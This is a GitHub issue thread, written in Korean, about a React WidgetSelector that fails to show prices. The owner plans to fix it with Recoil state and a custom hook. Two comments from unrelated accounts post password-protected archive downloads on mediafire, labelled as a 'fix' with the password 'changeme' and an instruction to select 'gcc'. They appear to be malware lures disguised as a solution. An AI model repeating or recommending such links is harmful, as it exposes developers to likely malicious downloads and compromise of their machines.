### ISSUE TITLE
WidgetSelector 가격 표시 안 됨

### ISSUE THREAD

**Issue by deenuit113** [deenuit113/Tradin#19]
### Widget 컴포넌트에 환율 정보 관련 State 전달 안 됨

- [x] WidgetSelector.tsx에서 Widget 컴포넌트에 올바르게 props 전달을 하는가?
- [x] WidgetSelector에서 가격이 표시되는가?

**Comment by deenuit113** [comment]
props 전달 대신
isCurrencyKRW state > Recoil 전역 변수로 관리
exchangeRate > custom hook으로 불러올 수 있도록

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
